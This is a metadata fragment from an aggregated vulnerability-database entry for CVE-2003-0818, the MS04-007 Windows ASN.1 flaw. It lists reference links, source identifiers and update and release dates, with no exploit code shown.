url:https://www.rapid7.com/db/modules/exploit/windows/smb/ms04_007_killbill

Trust: 0.1

url:http://metasploit.com/framework/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2003-0818

Trust: 0.1

url:http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],

Trust: 0.1

url:http://www.kb.cert.org/vuls/id/583108>

Trust: 0.1

url:http://microsoft.com/technet/security/bulletin/ms04-007.asp>

Trust: 0.1

url:http://support.microsoft.com/default.aspx?scid=252648>

Trust: 0.1

url:http://www.kb.cert.org/vuls/id/216324>

Trust: 0.1

url:http://www.eeye.com/html/research/advisories/ad20040210.html>

Trust: 0.1

url:http://www.us-cert.gov/cas/techalerts/ta04-041a.html>

Trust: 0.1

url:http://www.eeye.com/html/research/advisories/ad20040210-2.html>

Trust: 0.1

sources: CERT/CC: VU#583108 // CERT/CC: VU#216324 // VULMON: CVE-2003-0818 // BID: 13300 // BID: 9633 // BID: 9635 // JVNDB: JVNDB-2004-000037 // PACKETSTORM: 83044 // PACKETSTORM: 32667 // CNNVD: CNNVD-200403-040 // NVD: CVE-2003-0818

CREDITS

Discovery of this vulnerability has been credited to eEye Digital Security.

Trust: 0.6

sources: BID: 9633 // BID: 9635

SOURCES

db:CERT/CCid:VU#583108
db:CERT/CCid:VU#216324
db:VULMONid:CVE-2003-0818
db:BIDid:13300
db:BIDid:9633
db:BIDid:9635
db:JVNDBid:JVNDB-2004-000037
db:PACKETSTORMid:83044
db:PACKETSTORMid:32667
db:CNNVDid:CNNVD-200403-040
db:NVDid:CVE-2003-0818

LAST UPDATE DATE

2024-08-14T12:57:20.421000+00:00


SOURCES UPDATE DATE

db:CERT/CCid:VU#583108date:2004-02-10T00:00:00
db:CERT/CCid:VU#216324date:2004-02-11T00:00:00
db:VULMONid:CVE-2003-0818date:2019-04-30T00:00:00
db:BIDid:13300date:2009-07-12T14:06:00
db:BIDid:9633date:2009-07-12T02:06:00
db:BIDid:9635date:2009-07-12T02:06:00
db:JVNDBid:JVNDB-2004-000037date:2007-04-01T00:00:00
db:CNNVDid:CNNVD-200403-040date:2019-05-05T00:00:00
db:NVDid:CVE-2003-0818date:2019-04-30T14:27:13.710

SOURCES RELEASE DATE

db:CERT/CCid:VU#583108date:2004-02-10T00:00:00
db:CERT/CCid:VU#216324date:2004-02-10T00:00:00
db:VULMONid:CVE-2003-0818date:2004-03-03T00:00:00
db:BIDid:13300date:2005-04-21T00:00:00
db:BIDid:9633date:2004-02-10T00:00:00
db:BIDid:9635date:2004-02-10T00:00:00
db:JVNDBid:JVNDB-2004-000037date:2007-04-01T00:00:00
db:PACKETSTORMid:83044date:2009-11-26T00:34:53
db:PACKETSTORMid:32667date:2004-02-11T02:24:00
db:CNNVDid:CNNVD-200403-040date:2003-11-11T00:00:00
db:NVDid:CVE-2003-0818date:2004-03-03T05:00:00